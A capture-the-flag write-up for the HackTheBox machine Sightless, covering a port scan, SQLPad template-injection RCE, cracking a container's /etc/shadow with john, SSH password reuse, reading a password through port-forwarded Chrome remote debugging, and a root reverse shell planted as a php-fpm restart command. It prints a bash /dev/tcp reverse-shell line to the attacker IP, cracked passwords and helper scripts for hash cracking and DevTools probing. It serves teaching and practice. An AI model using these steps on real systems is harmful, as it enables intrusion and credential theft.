Sightless on HackTheBox

Before all

I quite like this machine: it feels fairly real-world and has a few rabbit holes.
Victim’s IP : 10.10.11.32
Victim’s Host : *.sightless.htb
Attacker’s IP : 10.10.14.114

RECON

port scan

Command

rustscan -a 10.10.11.32 --ulimit 5000 -- -sC -sV -Pn

Result

PORT   STATE SERVICE REASON         VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGoivagBalUNqQKPAE2WFpkFMj+vKwO9D3RiUUxsnkBNKXp5ql1R+kvjG89Iknc24EDKuRWDzEivKXYrZJE9fxg=
| 256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA4BBc5R8qY5gFPDOqODeLBteW5rxF+qR5j36q9mO+bu
80/tcp open http syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Sightless.htb

In short, the box exposes FTP (ProFTPD, no version in the banner), SSH (OpenSSH 8.9p1, the Ubuntu 22.04 build) and HTTP (nginx 1.18.0). The HTTP title gives away the sightless.htb hostname, which goes into /etc/hosts.

subdomain discovery

image
After browsing to sightless.htb and clicking the button on the page, the link points at sqlpad.sightless.htb (add both names to /etc/hosts for 10.10.11.32).

Exploit

CVE-2022-0944

Clicking About shows Version: 6.10.0, which is before the 6.10.1 fix for CVE-2022-0944 (template injection in SQLPad's connection-test endpoint), so the PoC at https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944/tree/main applies.
That gives a shell, but inside a Docker container rather than on the host:
image

Privilege Escalation

/etc/shadow cracking

From inside the container, grab /etc/shadow and /etc/passwd, copy them to the attacker machine, and run unshadow followed by a john wordlist attack:

unshadow passwd shadow > etc_hash
john etc_hash --wordlist=/home/kali/rockyou.txt

Cracked:

blindside        (root)
insaneclownposse (michael)
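What unshadow actually produces, and the check worth doing before a long wordlist run, as an added example (not the author's tooling): merge the two files the way unshadow(8) does and read the crypt(3) prefix of each hash to pick john's --format. This matters on an Ubuntu 22.04 host like this one, where new passwords are hashed with yescrypt ($y$), which john jumbo cracks only through its libc-backed crypt format and much more slowly than sha512crypt. PASSWD and SHADOW below are constructed samples: the hash strings keep the real $id$salt$hash layout but their values are made up.

```python
#!/usr/bin/env python3
"""unshadow-style merge plus john format selection. Example added to this
write-up; the sample files are constructed, not the ones from the box."""

# constructed sample input (not the files taken from the container)
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
michael:x:1000:1000::/home/michael:/bin/bash
"""
SHADOW = """\
root:$6$c0nstructed$Xf7gL0t3ZpQ9wVb1:19600:0:99999:7:::
daemon:*:19600:0:99999:7:::
michael:$y$j9T$c0nstructedsalt$Z9q2Lm5pT0vA1:19600:0:99999:7:::
"""

# crypt(3) prefix -> john --format name (john jumbo names)
FORMATS = [
    ("$1$", "md5crypt"),
    ("$2a$", "bcrypt"), ("$2b$", "bcrypt"), ("$2y$", "bcrypt"),
    ("$5$", "sha256crypt"),
    ("$6$", "sha512crypt"),
    ("$7$", "crypt"),      # scrypt: handled through libc crypt(3)
    ("$y$", "crypt"),      # yescrypt: handled through libc crypt(3)
]


def john_format(h):
    """Name the john format for one shadow hash, or flag unusable entries."""
    if h in ("", "*") or h.startswith("!"):
        return "locked/no hash"
    for prefix, fmt in FORMATS:
        if h.startswith(prefix):
            return fmt
    return "unknown"


def unshadow(passwd_text, shadow_text):
    """Return passwd lines with the 'x' in field 2 replaced by the shadow hash
    (what `unshadow passwd shadow` prints). Users missing from shadow keep
    their passwd field unchanged."""
    hashes = {}
    for line in shadow_text.splitlines():
        if line.strip():
            fields = line.split(":")
            hashes[fields[0]] = fields[1]
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        fields[1] = hashes.get(fields[0], fields[1])
        merged.append(":".join(fields))
    return merged


def crack_plan(passwd_text, shadow_text):
    """Group crackable users by john format so each format gets one run."""
    plan = {}
    for line in unshadow(passwd_text, shadow_text):
        user, h = line.split(":")[:2]
        fmt = john_format(h)
        if fmt != "locked/no hash":
            plan.setdefault(fmt, []).append(user)
    return plan


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    for fmt, users in crack_plan(PASSWD, SHADOW).items():
        print("john --format=%s --wordlist=rockyou.txt etc_hash   # %s"
              % (fmt, ", ".join(users)))
```

Without --format john guesses from the first hash it sees and may silently skip the rest of a mixed file, so splitting the run by format is the safe habit.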

The hashes came from the container, but michael's password is reused on the host, so it works for SSH:

ssh michael@10.10.11.32

Abusing chrome debug

Once on the host over SSH, Chrome turns out to be running with remote debugging enabled:
image
ss -tulnp shows a service on port 8080 bound to loopback only, so it is forwarded to the attacker machine with an SSH port forward.
Listening ports on the host:

Netid   State    Recv-Q   Send-Q     Local Address:Port       Peer Address:Port   Process   
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:3000 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 5 127.0.0.1:33415 0.0.0.0:*
tcp LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
tcp LISTEN 0 511 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.1:46671 0.0.0.0:*
tcp LISTEN 0 10 127.0.0.1:46497 0.0.0.0:*
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 *:21 *:*
tcp LISTEN 0 128 [::]:22 [::]:*

port forward:

ssh -L 8080:localhost:8080 michael@10.10.11.32

Forward ports 33415, 46671 and 46497 the same way; these are the loopback-only high ports from the ss listing, and one of them is Chrome's debugging port.
Following online references, open chrome://inspect/#devices in a local Chrome, click Configure, and add 127.0.0.1:<port> entries for each forwarded port.
image
Before long a remote target shows up. Clicking inspect opens the page the headless browser is driving, and the site's login password is visible in the rendered form:
image
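A way to tell which of the forwarded ports is the DevTools endpoint without guessing in chrome://inspect, as an added example (not the author's steps): Chrome's remote-debugging HTTP interface answers /json/version with a Browser string and a browser-level webSocketDebuggerUrl, and /json/list with the open targets; anything else on those ports fails one of those checks. This assumes all four ports are forwarded in one session (ssh -L 8080:localhost:8080 -L 33415:localhost:33415 -L 46671:localhost:46671 -L 46497:localhost:46497 michael@10.10.11.32) and uses only the standard library.

```python
#!/usr/bin/env python3
"""Probe forwarded localhost ports for Chrome DevTools and list page targets.
Example code added to this write-up; the port list mirrors the ss output and
the /json/version and /json/list endpoints are Chrome's documented
remote-debugging HTTP interface."""
import http.client
import json
import urllib.error
import urllib.request

CANDIDATE_PORTS = [33415, 46671, 46497]   # loopback-only high ports from ss -tulnp


def fetch_json(port, path, timeout=3):
    """GET http://127.0.0.1:<port><path>; return parsed JSON or None.
    Non-HTTP listeners raise BadStatusLine (an HTTPException), not OSError."""
    url = "http://127.0.0.1:%d%s" % (port, path)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return json.loads(resp.read().decode())
    except (urllib.error.URLError, http.client.HTTPException, OSError, ValueError):
        return None


def is_devtools(version_info):
    """True only for a /json/version reply shaped like Chrome's."""
    return bool(version_info) and "Browser" in version_info \
        and "webSocketDebuggerUrl" in version_info


def summarize_targets(targets):
    """Reduce a /json/list reply to (type, title, url, ws_url) tuples, keeping
    page and iframe targets: those are the ones whose DOM you can read."""
    out = []
    for t in targets or []:
        if t.get("type") in ("page", "iframe"):
            out.append((t["type"], t.get("title", ""), t.get("url", ""),
                        t.get("webSocketDebuggerUrl", "")))
    return out


def scan(ports=CANDIDATE_PORTS):
    """Map each DevTools port to (browser string, page targets)."""
    found = {}
    for p in ports:
        v = fetch_json(p, "/json/version")
        if is_devtools(v):
            found[p] = (v["Browser"], summarize_targets(fetch_json(p, "/json/list")))
    return found


if __name__ == "__main__":
    for port, (browser, targets) in scan().items():
        print("port %d: %s" % (port, browser))
        for typ, title, url, ws in targets:
            print("  [%s] %s  %s\n      %s" % (typ, title, url, ws))
```

The webSocketDebuggerUrl printed for a page target is what chrome://inspect connects to behind the scenes; the page URL alone already tells you which site the automated browser is logging into.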
After logging in, http://admin.sightless.htb:8080/admin_phpsettings.php?page=fpmdaemons lets you edit the php-fpm restart command (map admin.sightless.htb to 127.0.0.1 in the local hosts file so the name resolves through the forwarded port). Pasting a reverse-shell one-liner straight into that field is rejected as an invalid format, so point it at a script instead.
First create /tmp/rev.sh on the target, from the michael SSH session, with the reverse shell:

#!/bin/bash
# /dev/tcp and the >& redirection are bash features; without the shebang the
# file may be run by /bin/sh (dash on Ubuntu), which supports neither.
sh -i >& /dev/tcp/10.10.14.114/9999 0>&1

Finally chmod +x /tmp/rev.sh and set the restart command to /tmp/rev.sh:
image
With a listener waiting on port 9999 on the attacker machine (nc -lvnp 9999), the next php-fpm restart runs the script as root: root shell!
image